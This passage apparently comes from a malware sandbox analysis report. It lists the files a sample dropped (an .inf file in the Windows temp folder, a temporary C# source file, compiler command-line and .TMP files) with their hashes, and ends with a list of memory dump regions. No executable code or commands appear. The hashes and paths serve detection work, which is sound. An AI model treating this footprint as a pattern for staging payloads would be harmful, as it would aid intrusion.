            SHA256    1f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f
            SHA512    b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452

          • C:\windows\temp\f5wfs5m4.inf
            Filesize  675B
            MD5       0a85805c6649ad8e6f40c9ddc1258a49
            SHA1      69ca8a686c49218281a09bbed22ef55654a04459
            SHA256    f20428b0f70a5fa861f27eef9583b473217ee467ef39f475d337f073851436be
            SHA512    16775646f1df49f479e967c885e9948c52fcd31abc2041c63a50fd32e1380d3d963612d02f2db62e39c3bdcc959eb2d56f40d9f0f82a36897c8340206e355fad

          • \??\c:\Users\Admin\AppData\Local\Temp\b354ygql\CSCBF6DCB1C89F2491BB711D588CFC66CC7.TMP
            Filesize  652B
            MD5       ba4500c647b2c6299f68e01b9df16ed0
            SHA1      879d8da67400f1410ce23fde7824a106bf9ac149
            SHA256    c56df21e810b1e5ce7a2072d2ae8eec126f5ad30aa226032d664c041e3ea2932
            SHA512    4d1a5e603fdde446bceba2c6a450502847c0439e98772f5e84cd61e32d37235175841040dfe37b27e66554b75f11302fa4a6aac6fd037a044fe402ba023642df

          • \??\c:\Users\Admin\AppData\Local\Temp\b354ygql\b354ygql.0.cs
            Filesize  2KB
            MD5       b8f676e5e58a88c030c8437cf8c44510
            SHA1      d2a94f790a3f41e2e207b6875c3215ad6788d902
            SHA256    4580f48e57bafd774e5e2f48b8a7c67541f6cffd366fe702d1d414ca74abe1ab
            SHA512    66af99543b3d818bcc700e32686067c8483135f94492f3e6f5a58c8d55ef6f4488052a9311d37fc822284f41b0eec0edfcf12beba4b91b62d42acc3578220b7e

          • \??\c:\Users\Admin\AppData\Local\Temp\b354ygql\b354ygql.cmdline
            Filesize  369B
            MD5       98d5ad93886fb627b1e50875bf2675f4
            SHA1      cf5343ba99e01b285fa5239ca5e380bfb1e1c94f
            SHA256    5799fe2724c5e73ea553caa09256c30ffbc041b9e8764b7f858a088aaffee6cc
            SHA512    f19b1e9f81c5fa676fa4d2efc5725b1666ebd946d28b60fb71cf4207315c0bcca2249383c24262e3f6469b2c8f219fbee63ecc2cd6979869b3ba6cda4efa3f4d

          • memory/1404-144-0x0000000140000000-0x000000014007A000-memory.dmp
            Filesize  488KB

          • memory/1404-143-0x00000186CE830000-0x00000186CE886000-memory.dmp
            Filesize  344KB

          • memory/3428-13-0x000001C2B2CA0000-0x000001C2B2CBC000-memory.dmp
            Filesize  112KB

          • memory/3428-12-0x00007FF91E910000-0x00007FF91F3D1000-memory.dmp
            Filesize  10.8MB

          • memory/3428-26-0x000001C2B2CC0000-0x000001C2B2CC8000-memory.dmp
            Filesize  32KB

          • memory/3428-0-0x00007FF91E913000-0x00007FF91E915000-memory.dmp
            Filesize  8KB

          • memory/3428-44-0x00007FF91E910000-0x00007FF91F3D1000-memory.dmp
            Filesize  10.8MB

          • memory/3428-43-0x00007FF91E913000-0x00007FF91E915000-memory.dmp
            Filesize  8KB

          • memory/3428-11-0x00007FF91E910000-0x00007FF91F3D1000-memory.dmp
            Filesize  10.8MB

          • memory/3428-1-0x000001C2B0AA0000-0x000001C2B0AC2000-memory.dmp
            Filesize  136KB

          • memory/3428-48-0x00007FF91E910000-0x00007FF91F3D1000-memory.dmp
            Filesize  10.8MB

          • memory/4436-74-0x00000251FB3D0000-0x00000251FB424000-memory.dmp
            Filesize  336KB

          • memory/4436-63-0x00000251FB350000-0x00000251FB3C6000-memory.dmp
            Filesize  472KB

          • memory/4436-62-0x00000251FAF00000-0x00000251FAF44000-memory.dmp
            Filesize  272KB